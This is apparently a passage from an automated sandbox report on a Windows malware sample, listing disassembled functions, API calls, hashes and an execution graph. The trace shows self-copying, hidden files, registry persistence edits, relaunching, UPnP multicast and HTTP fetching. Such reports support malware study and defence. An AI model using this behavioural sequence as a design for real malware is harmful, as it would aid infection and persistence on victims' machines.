                                                                                                                                                                                                      • Instruction ID: 94d3ecd3e534f0c2973a063d63be5db40503c7f445082467247c405133df6831
                                                                                                                                                                                                      • Opcode Fuzzy Hash: d549018ca7281a3a12c42c42db4c5aa0698fc19bb076c2a4b3e2f7f0a4b3168e
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FEE01275944208FBD7049FA0ED0EB9D77649B04341F1041A5FD05A22A1DAF56E80D755
                                                                                                                                                                                                      Function 004073E0 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00407670: CoCreateInstance.OLE32(00000000,00000000,00004401,00000000,00000000), ref: 00407690
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 004075F8
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFreeInstanceString
                                                                                                                                                                                                      • String ID: Microsoft Corporation
                                                                                                                                                                                                      • API String ID: 586785272-3838278685
                                                                                                                                                                                                      • Opcode ID: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction ID: e42f15a5a8f3a5930d9f1f6311551bcb6c6e46ad7cdc057207f56e8781896ff9
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 803bccba2cddfb0e8a4aae8b96d6d08667bbe6654a4f0d67ac19fa841d2eca73
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5191FB75E0450AAFCB14DB98CC94EAFB7B5BF48300F208169E505B73A0D735AE42CB66
                                                                                                                                                                                                      Function 0040E400 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 0040E640: memset.NTDLL ref: 0040E668
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCrackUrlA.WININET(0040E119,00000000,10000000,0000003C), ref: 0040E6B8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0040E6C8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040E701
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,00000000,00000000), ref: 0040E737
                                                                                                                                                                                                        • Part of subcall function 0040E640: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040E75F
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetReadFile.WININET(00000000,?,00000400,?), ref: 0040E7A8
                                                                                                                                                                                                        • Part of subcall function 0040E640: InternetCloseHandle.WININET(00000000), ref: 0040E837
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysAllocString.OLEAUT32(00000000), ref: 0040E55E
                                                                                                                                                                                                        • Part of subcall function 0040E530: CoCreateInstance.OLE32(00413000,00000000,00004401,00412FF0,00000000), ref: 0040E586
                                                                                                                                                                                                        • Part of subcall function 0040E530: SysFreeString.OLEAUT32(00000000), ref: 0040E621
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Internet$String$Free$HttpOpenRequest$AllocCloseConnectCrackCreateFileHandleInstanceReadSendmemset
                                                                                                                                                                                                      • String ID: %S%S
                                                                                                                                                                                                      • API String ID: 1017111014-3267608656
                                                                                                                                                                                                      • Opcode ID: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction ID: e5c4592a6bf7e21b90caaa4e382eb9027ff93744cff569d410d2f086dfa1b48d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 20876e0eb685dac13c64e0264db20ecd2e25c5e2071ea80cc012e61abc239ccc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 41415CB5D00209AFCB04DFE5C885AEFB7B5BF48304F104929E605B7390E738AA41CBA1
                                                                                                                                                                                                      Function 0040E0C0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CoInitializeEx.OLE32(00000000,00000002,?,?,?,004083D2), ref: 0040E0CA
                                                                                                                                                                                                        • Part of subcall function 0040E190: socket.WS2_32(00000002,00000002,00000011), ref: 0040E1AA
                                                                                                                                                                                                        • Part of subcall function 0040E190: htons.WS2_32(0000076C), ref: 0040E1E0
                                                                                                                                                                                                        • Part of subcall function 0040E190: inet_addr.WS2_32(239.255.255.250), ref: 0040E1EF
                                                                                                                                                                                                        • Part of subcall function 0040E190: setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040E20D
                                                                                                                                                                                                        • Part of subcall function 0040E190: bind.WS2_32(000000FF,?,00000010), ref: 0040E243
                                                                                                                                                                                                        • Part of subcall function 0040E190: lstrlenA.KERNEL32(X#A,00000000,?,00000010), ref: 0040E25C
                                                                                                                                                                                                        • Part of subcall function 0040E190: sendto.WS2_32(000000FF,X#A,00000000), ref: 0040E26B
                                                                                                                                                                                                        • Part of subcall function 0040E190: ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040E285
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4DB
                                                                                                                                                                                                        • Part of subcall function 0040E400: SysFreeString.OLEAUT32(00000000), ref: 0040E4E5
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: FreeString$Initializebindhtonsinet_addrioctlsocketlstrlensendtosetsockoptsocket
                                                                                                                                                                                                      • String ID: TCP$UDP
                                                                                                                                                                                                      • API String ID: 1519345861-1097902612
                                                                                                                                                                                                      • Opcode ID: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction ID: 4536849a39b1ff6f82dd019fff268beff13b49d9c24eb1714a693627677867a5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4d93ce47139e5fe62163282bdde6dfb132a2b2f81b545c1a314b9c0cb3165857
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C511B4B4E00208EBDB00EFD6DC45BAE7375AB44708F10896AE5047B2C2D6799E21CB89
                                                                                                                                                                                                      Function 0040DCD0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42synchronizationCOMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,00000000), ref: 0040DD10
                                                                                                                                                                                                      • CloseHandle.KERNEL32(?), ref: 0040DD29
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CloseHandleObjectSingleWait
                                                                                                                                                                                                      • String ID: .Wu
                                                                                                                                                                                                      • API String ID: 528846559-3424199868
                                                                                                                                                                                                      • Opcode ID: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction ID: afdab107b7ea46b491ba3f785a3108c34962e981a5b403661ae60ceb940f9cda
                                                                                                                                                                                                      • Opcode Fuzzy Hash: e15632ae9c74927274e801b832af1c2d3c046c8cbd4ac2304eb1b22343a8a1a8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F11C974A04208EFDB14CF84C580B59B7B6FF49314F2081AAEC06AB381C775EE42DB95
                                                                                                                                                                                                      Function 00405EF0 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00415B88,?,00000000,?), ref: 00405EFF
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405F3E
                                                                                                                                                                                                      • memcpy.NTDLL(00000000,00000000,00000100), ref: 00405FB3
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00415B88), ref: 00405FD0
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.1568181254.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568162964.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568200652.0000000000410000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000003.00000002.1568217713.0000000000414000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_5232.jbxd
                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSectionmemcpy$EnterLeave
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 469056452-0
                                                                                                                                                                                                      • Opcode ID: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction ID: 31cd86352096c342a95fcbe165c6b10336903156d0058c686e7ee331cda8bfc5
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f0f4f80585b29744b6880eeb75b2d3a88a0070be33d566f9884971b99258328
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 08218D35D04609EFDB04DB94D885BDEBB71EB44304F1481BAE8096B380D37CA985CF8A

                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                      Execution Coverage:14.9%
                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                                                      Total number of Nodes:1499
                                                                                                                                                                                                      Total number of Limit Nodes:26
                                                                                                                                                                                                      execution_graph 4458 407940 Sleep CreateMutexA GetLastError 4459 407976 ExitProcess 4458->4459 4460 40797e 6 API calls 4458->4460 4461 407d31 Sleep ShellExecuteW ShellExecuteW RegOpenKeyExW 4460->4461 4462 407a23 4460->4462 4463 407dcb RegOpenKeyExW 4461->4463 4464 407d9f RegSetValueExW RegCloseKey 4461->4464 4623 40f1b0 GetLocaleInfoA strcmp 4462->4623 4466 407e24 RegOpenKeyExW 4463->4466 4467 407df8 RegSetValueExW RegCloseKey 4463->4467 4464->4463 4469 407e51 RegSetValueExW RegCloseKey 4466->4469 4470 407e7d RegOpenKeyExW 4466->4470 4467->4466 4469->4470 4475 407ed6 RegOpenKeyExW 4470->4475 4476 407eaa RegSetValueExW RegCloseKey 4470->4476 4471 407a30 ExitProcess 4472 407a38 ExpandEnvironmentStringsW wsprintfW CopyFileW 4473 407b36 Sleep wsprintfW CopyFileW 4472->4473 4474 407a8c SetFileAttributesW RegOpenKeyExW 4472->4474 4480 407c28 Sleep ExpandEnvironmentStringsW wsprintfW CopyFileW 4473->4480 4481 407b7e SetFileAttributesW RegOpenKeyExW 4473->4481 4474->4473 4479 407ac8 wcslen RegSetValueExW 4474->4479 4477 407f03 RegSetValueExW RegCloseKey 4475->4477 4478 407f2f RegOpenKeyExW 4475->4478 4476->4475 4477->4478 4483 407f88 RegOpenKeyExW 4478->4483 4484 407f5c RegSetValueExW RegCloseKey 4478->4484 4485 407b29 RegCloseKey 4479->4485 4486 407afd RegCloseKey 4479->4486 4480->4461 4482 407c87 SetFileAttributesW RegOpenKeyExW 4480->4482 4481->4480 4487 407bba wcslen RegSetValueExW 4481->4487 4482->4461 4488 407cc3 wcslen RegSetValueExW 4482->4488 4490 407fb5 RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4483->4490 4491 40801f RegOpenKeyExW 4483->4491 4484->4483 4485->4473 4625 40f400 memset memset CreateProcessW 4486->4625 4492 407c1b RegCloseKey 4487->4492 4493 407bef RegCloseKey 4487->4493 4494 407d24 RegCloseKey 4488->4494 4495 407cf8 RegCloseKey 4488->4495 4490->4491 4497 408050 RegSetValueExW RegSetValueExW RegSetValueExW RegSetValueExW RegCloseKey 4491->4497 4498 4080d9 RegOpenKeyExW 4491->4498 4492->4480 4499 40f400 6 API calls 4493->4499 4494->4461 4500 40f400 6 API calls 4495->4500 4497->4498 4502 4081f0 RegOpenKeyExW 4498->4502 4503 40810a 8 API calls 4498->4503 4504 407c08 4499->4504 4505 407d11 4500->4505 4501 407b21 ExitProcess 4506 408221 8 API calls 4502->4506 4507 408307 Sleep 4502->4507 4503->4502 4504->4492 4508 407c13 ExitProcess 4504->4508 4505->4494 4509 407d1c ExitProcess 4505->4509 4506->4507 4537 40d180 4507->4537 4512 408322 9 API calls 4540 405c00 InitializeCriticalSection CreateFileW 4512->4540 5826 4077f0 4512->5826 5833 4058c0 4512->5833 5842 406f70 Sleep GetModuleFileNameW 4512->5842 4515 40848e 4519 4083d7 CreateEventA 4571 40c8b0 4519->4571 4528 40dbe0 330 API calls 4529 408438 4528->4529 4530 40dbe0 330 API calls 4529->4530 4531 408453 4530->4531 4532 40dbe0 330 API calls 4531->4532 4533 40846f 4532->4533 4614 40dd50 GetCurrentThread GetThreadPriority GetCurrentThread SetThreadPriority 4533->4614 4535 408480 4631 40de90 4535->4631 4639 40d150 4537->4639 4541 405d25 4540->4541 4542 405c38 CreateFileMappingW 4540->4542 4553 40e0c0 CoInitializeEx 4541->4553 4543 405c59 MapViewOfFile 4542->4543 4544 405d11 4542->4544 4543->4544 4545 405c78 GetFileSize 4543->4545 4544->4541 4549 405c8d 4545->4549 4546 405d07 UnmapViewOfFile 4546->4544 4547 405c9c 4547->4546 4549->4546 4549->4547 4550 405ccc 4549->4550 4768 40d1d0 4549->4768 4775 405d30 4549->4775 4551 40ab60 __aligned_recalloc_base 3 API calls 4550->4551 4551->4547 5080 40e190 socket 4553->5080 4555 40e0e0 4556 4083d2 4555->4556 4559 40e12a 4555->4559 4565 40e168 4555->4565 5090 40e400 4555->5090 4566 407390 CoInitializeEx SysAllocString 4556->4566 5105 40b430 htons 4559->5105 4564 40eef0 24 API calls 4564->4565 5124 40ac80 4565->5124 4567 4073b2 4566->4567 4568 4073c8 CoUninitialize 4566->4568 5269 4073e0 4567->5269 4568->4519 5278 40c870 4571->5278 4574 40c870 3 API calls 4575 40c8ce 4574->4575 4576 40c870 3 API calls 4575->4576 4577 40c8de 4576->4577 4578 40c870 3 API calls 4577->4578 4579 4083ef 4578->4579 4580 40dbb0 4579->4580 4581 40a740 7 API calls 4580->4581 4582 40dbbb 4581->4582 4583 4083f9 4582->4583 4584 40dbc7 InitializeCriticalSection 4582->4584 4585 40bc70 InitializeCriticalSection 4583->4585 4584->4583 4596 40bc8a 4585->4596 4586 40bcb9 CreateFileW 4588 40bce0 CreateFileMappingW 4586->4588 4589 40bd8e 4586->4589 4588->4589 4590 40bd01 MapViewOfFile 4588->4590 5333 40b510 EnterCriticalSection 4589->5333 4590->4589 4593 40bd1c GetFileSize 4590->4593 4600 40bd3b 4593->4600 4594 40bda7 4595 40dbe0 330 API calls 4594->4595 4597 408403 4595->4597 4596->4586 5285 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4596->5285 5286 40b850 4596->5286 4602 40dbe0 4597->4602 4598 40bd84 UnmapViewOfFile 4598->4589 4600->4598 4601 40b850 31 API calls 4600->4601 5336 40df20 NtQuerySystemTime RtlTimeToSecondsSince1980 4600->5336 4601->4600 4603 40dbf7 EnterCriticalSection 4602->4603 4604 40841c 4602->4604 5361 40dcd0 4603->5361 4604->4528 4607 40dcbb LeaveCriticalSection 4607->4604 4608 40a990 9 API calls 4609 40dc39 4608->4609 4609->4607 4610 40dc4b CreateThread 4609->4610 4610->4607 4611 40dc6e 4610->4611 5365 40bdd0 4610->5365 5371 40dfd0 4610->5371 5381 401f50 GetQueuedCompletionStatus 4610->5381 5388 40e070 4610->5388 5394 40d980 4610->5394 5401 401920 GetTickCount WaitForSingleObject 4610->5401 5424 40d930 4610->5424 4612 40dc92 GetCurrentProcess GetCurrentProcess DuplicateHandle 4611->4612 4613 40dcb4 4611->4613 4612->4613 4613->4607 4615 40dd86 InterlockedExchangeAdd 4614->4615 4616 40de69 GetCurrentThread SetThreadPriority 4614->4616 4615->4616 4618 40dda0 4615->4618 4616->4535 4617 40ddb9 EnterCriticalSection 4617->4618 4618->4616 4618->4617 4619 40de27 LeaveCriticalSection 4618->4619 4620 40de03 WaitForSingleObject 4618->4620 4621 40de5c Sleep 4618->4621 4622 40de3e 4618->4622 4619->4618 4619->4622 4620->4618 4621->4618 4622->4616 4624 407a28 4623->4624 4624->4471 4624->4472 4626 40f471 ShellExecuteW 4625->4626 4627 40f462 Sleep 4625->4627 4629 40f4a6 4626->4629 4630 40f497 Sleep 4626->4630 4628 407b16 4627->4628 4628->4485 4628->4501 4629->4628 4630->4628 4632 40df12 4631->4632 4633 40de9c EnterCriticalSection 4631->4633 4632->4515 4634 40deb8 LeaveCriticalSection DeleteCriticalSection 4633->4634 4636 40ab60 __aligned_recalloc_base 3 API calls 4634->4636 4637 40df06 4636->4637 4638 40ab60 __aligned_recalloc_base 3 API calls 4637->4638 4638->4632 4642 40cda0 4639->4642 4643 40cdd3 4642->4643 4644 40cdbe 4642->4644 4647 408317 4643->4647 4648 40cf80 4643->4648 4682 40ce00 4644->4682 4647->4512 4647->4515 4649 40cfa9 4648->4649 4650 40d05a 4648->4650 4681 40d052 4649->4681 4708 40a740 4649->4708 4653 40a740 7 API calls 4650->4653 4650->4681 4654 40d07e 4653->4654 4656 402420 7 API calls 4654->4656 4654->4681 4658 40d0a2 4656->4658 4661 40a740 7 API calls 4658->4661 4659 40a740 7 API calls 4660 40cff2 4659->4660 4716 4024e0 4660->4716 4663 40d0b1 4661->4663 4665 4024e0 10 API calls 4663->4665 4664 40d01b 4719 40ab60 4664->4719 4667 40d0da 4665->4667 4669 40ab60 __aligned_recalloc_base 3 API calls 4667->4669 4671 40d0e6 4669->4671 4670 402420 7 API calls 4672 40d038 4670->4672 4673 402420 7 API calls 4671->4673 4674 4024e0 10 API calls 4672->4674 4675 40d0f7 4673->4675 4674->4681 4676 4024e0 10 API calls 4675->4676 4677 40d111 4676->4677 4678 402420 7 API calls 4677->4678 4679 40d122 4678->4679 4680 4024e0 10 API calls 4679->4680 4680->4681 4681->4647 4683 40ceb2 4682->4683 4684 40ce29 4682->4684 4687 40a740 7 API calls 4683->4687 4707 40ceaa 4683->4707 4685 40a740 7 API calls 4684->4685 4684->4707 4686 40ce3c 4685->4686 4689 402420 7 API calls 4686->4689 4686->4707 4688 40ced8 4687->4688 4690 402420 7 API calls 4688->4690 4688->4707 4691 40ce65 4689->4691 4692 40cf05 4690->4692 4693 4024e0 10 API calls 4691->4693 4694 4024e0 10 API calls 4692->4694 4695 40ce7f 4693->4695 4696 40cf1f 4694->4696 4697 402420 7 API calls 4695->4697 4698 402420 7 API calls 4696->4698 4699 40ce90 4697->4699 4700 40cf30 4698->4700 4701 4024e0 10 API calls 4699->4701 4702 4024e0 10 API calls 4700->4702 4701->4707 4703 40cf4a 4702->4703 4704 402420 7 API calls 4703->4704 4705 40cf5b 4704->4705 4706 4024e0 10 API calls 4705->4706 4706->4707 4707->4647 4726 40a760 4708->4726 4711 402420 4747 40a950 4711->4747 4754 402540 4716->4754 4718 4024ff __aligned_recalloc_base 4718->4664 4764 40a800 GetCurrentProcessId 4719->4764 4721 40ab6b 4722 40ab72 4721->4722 4765 40aaa0 4721->4765 4722->4670 4725 40ab87 HeapFree 4725->4722 4735 40a800 GetCurrentProcessId 4726->4735 4728 40a76b 4729 40a777 __aligned_recalloc_base 4728->4729 4736 40a820 4728->4736 4731 40a74e 4729->4731 4732 40a792 RtlAllocateHeap 4729->4732 4731->4681 4731->4711 4732->4731 4733 40a7b9 __aligned_recalloc_base 4732->4733 4733->4731 4734 40a7d4 memset 4733->4734 4734->4731 4735->4728 4744 40a800 GetCurrentProcessId 4736->4744 4738 40a829 4739 40a846 HeapCreate 4738->4739 4745 40a890 GetProcessHeaps 4738->4745 4740 40a860 HeapSetInformation GetCurrentProcessId 4739->4740 4741 40a887 4739->4741 4740->4741 4741->4729 4744->4738 4746 40a83c 4745->4746 4746->4739 4746->4741 4748 40a760 __aligned_recalloc_base 7 API calls 4747->4748 4749 40242b 4748->4749 4750 402820 4749->4750 4751 40282a 4750->4751 4752 40a950 __aligned_recalloc_base 7 API calls 4751->4752 4753 402438 4752->4753 4753->4659 4755 40258e 4754->4755 4757 402551 4754->4757 4756 40a950 __aligned_recalloc_base 7 API calls 4755->4756 4755->4757 4760 4025b2 _invalid_parameter 4756->4760 4757->4718 4758 4025e2 memcpy 4759 402606 _invalid_parameter 4758->4759 4761 40ab60 __aligned_recalloc_base 3 API calls 4759->4761 4760->4758 4762 40ab60 __aligned_recalloc_base 3 API calls 4760->4762 4761->4757 4763 4025df 4762->4763 4763->4758 4764->4721 4766 40aad0 HeapValidate 4765->4766 4767 40aaf0 4765->4767 4766->4767 4767->4722 4767->4725 4785 40abd0 4768->4785 4771 40d211 4771->4549 4774 40ab60 __aligned_recalloc_base 3 API calls 4774->4771 4998 40a990 4775->4998 4778 405d6a memcpy 4779 40abd0 8 API calls 4778->4779 4780 405da1 4779->4780 5008 40cb40 4780->5008 4783 405e28 4783->4549 4786 40abfd 4785->4786 4787 40a950 __aligned_recalloc_base 7 API calls 4786->4787 4788 40ac12 4786->4788 4789 40ac14 memcpy 4786->4789 4787->4786 4788->4771 4790 40c6e0 4788->4790 4789->4786 4792 40c6ea 4790->4792 4794 40c721 memcmp 4792->4794 4795 40c748 4792->4795 4797 40ab60 __aligned_recalloc_base 3 API calls 4792->4797 4798 40c709 4792->4798 4799 40cbd0 4792->4799 4813 4084a0 4792->4813 4794->4792 4796 40ab60 __aligned_recalloc_base 3 API calls 4795->4796 4796->4798 4797->4792 4798->4771 4798->4774 4800 40cbdf __aligned_recalloc_base 4799->4800 4801 40a950 __aligned_recalloc_base 7 API calls 4800->4801 4812 40cbe9 4800->4812 4802 40cc78 4801->4802 4803 402420 7 API calls 4802->4803 4802->4812 4804 40cc8d 4803->4804 4805 402420 7 API calls 4804->4805 4806 40cc95 4805->4806 4808 40cced __aligned_recalloc_base 4806->4808 4816 40cd40 4806->4816 4821 402470 4808->4821 4811 402470 3 API calls 4811->4812 4812->4792 4929 40a6c0 4813->4929 4817 4024e0 10 API calls 4816->4817 4818 40cd54 4817->4818 4827 4026f0 4818->4827 4820 40cd6c 4820->4806 4822 4024ce 4821->4822 4825 402484 _invalid_parameter 4821->4825 4822->4811 4823 4024ac 4824 40ab60 __aligned_recalloc_base 3 API calls 4823->4824 4824->4822 4825->4823 4826 40ab60 __aligned_recalloc_base 3 API calls 4825->4826 4826->4823 4830 402710 4827->4830 4829 40270a 4829->4820 4831 402724 4830->4831 4832 402540 __aligned_recalloc_base 10 API calls 4831->4832 4833 40276d 4832->4833 4834 402540 __aligned_recalloc_base 10 API calls 4833->4834 4835 40277d 4834->4835 4836 402540 __aligned_recalloc_base 10 API calls 4835->4836 4837 40278d 4836->4837 4838 402540 __aligned_recalloc_base 10 API calls 4837->4838 4839 40279d 4838->4839 4840 4027a6 4839->4840 4841 4027cf 4839->4841 4845 403e20 4840->4845 4862 403df0 4841->4862 4844 4027c7 __aligned_recalloc_base 4844->4829 4846 402820 _invalid_parameter 7 API calls 4845->4846 4847 403e37 4846->4847 4848 402820 _invalid_parameter 7 API calls 4847->4848 4849 403e46 4848->4849 4850 402820 _invalid_parameter 7 API calls 4849->4850 4851 403e55 4850->4851 4852 402820 _invalid_parameter 7 API calls 4851->4852 4861 403e64 _invalid_parameter __aligned_recalloc_base 4852->4861 4854 40400f _invalid_parameter 4855 402850 _invalid_parameter 3 API calls 4854->4855 4856 404035 _invalid_parameter 4854->4856 4855->4854 4857 402850 _invalid_parameter 3 API calls 4856->4857 4858 40405b _invalid_parameter 4856->4858 4857->4856 4859 402850 _invalid_parameter 3 API calls 4858->4859 4860 404081 4858->4860 4859->4858 4860->4844 4861->4854 4865 402850 4861->4865 4869 404090 4862->4869 4864 403e0c 4864->4844 4866 402866 4865->4866 4867 40285b 4865->4867 4866->4861 4868 40ab60 __aligned_recalloc_base 3 API calls 4867->4868 4868->4866 4870 4040a6 _invalid_parameter 4869->4870 4871 4040dd 4870->4871 4873 4040b8 _invalid_parameter 4870->4873 4874 404103 4870->4874 4899 403ca0 4871->4899 4873->4864 4875 40413d 4874->4875 4876 40415e 4874->4876 4909 404680 4875->4909 4877 402820 _invalid_parameter 7 API calls 4876->4877 4879 40416f 4877->4879 4880 402820 _invalid_parameter 7 API calls 4879->4880 4881 40417e 4880->4881 4882 402820 _invalid_parameter 7 API calls 4881->4882 4883 40418d 4882->4883 4884 402820 _invalid_parameter 7 API calls 4883->4884 4885 40419c 4884->4885 4922 403d70 4885->4922 4887 402820 _invalid_parameter 7 API calls 4888 4041ca _invalid_parameter 4887->4888 4888->4887 4891 404284 _invalid_parameter __aligned_recalloc_base 4888->4891 4889 402850 _invalid_parameter 3 API calls 4889->4891 4890 4045a3 _invalid_parameter 4892 402850 _invalid_parameter 3 API calls 4890->4892 4893 4045c9 _invalid_parameter 4890->4893 4891->4889 4891->4890 4892->4890 4894 402850 _invalid_parameter 3 API calls 4893->4894 4895 4045ef _invalid_parameter 4893->4895 4894->4893 4896 402850 _invalid_parameter 3 API calls 4895->4896 4897 404615 _invalid_parameter 4895->4897 4896->4895 4897->4873 4898 402850 _invalid_parameter 3 API calls 4897->4898 4898->4897 4900 403cae 4899->4900 4901 402820 _invalid_parameter 7 API calls 4900->4901 4902 403ccb 4901->4902 4903 402820 _invalid_parameter 7 API calls 4902->4903 4904 403cda _invalid_parameter 4903->4904 4905 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4904->4905 4907 403d3a _invalid_parameter 4904->4907 4905->4904 4906 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4906->4907 4907->4906 4908 403d60 4907->4908 4908->4873 4910 402820 _invalid_parameter 7 API calls 4909->4910 4911 404697 4910->4911 4912 402820 _invalid_parameter 7 API calls 4911->4912 4913 4046a6 4912->4913 4914 402820 _invalid_parameter 7 API calls 4913->4914 4921 4046b5 _invalid_parameter __aligned_recalloc_base 4914->4921 4915 402850 _invalid_parameter GetCurrentProcessId HeapValidate HeapFree 4915->4921 4916 404841 _invalid_parameter 4917 402850 _invalid_parameter 